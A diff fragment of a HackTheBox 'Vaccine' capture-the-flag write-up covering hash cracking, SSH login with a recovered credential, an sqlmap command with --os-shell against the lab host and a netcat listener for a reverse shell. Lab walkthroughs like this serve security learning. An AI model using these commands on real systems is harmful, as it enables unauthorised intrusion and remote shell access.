theeldruin/Writeups/hackthebox/vaccine.md

 I tried crack this hash with john and hashcat, however a quick google search could saved some time
 ![alt text](./img/vaccine11.PNG?raw=true)

-With this credential we can connect to port 22 of this server:
+Remove the username from the found password and we have the correct credential, now we can connect to port 22(ssh) of this server:
 PS: we could use the sqlmap flag --os-shell to gain a shell and after gain an upgraded reverse shell with the next commands.
 However i lost the connection sometimes with this method
 - sqlmap -u http://10.10.10.46/dashboard.php?search=elixir --cookie PHPSESSID=qihiab8965c78chkp3u245b13e --os-shell
 - Attacker box: nc -nvlp 1234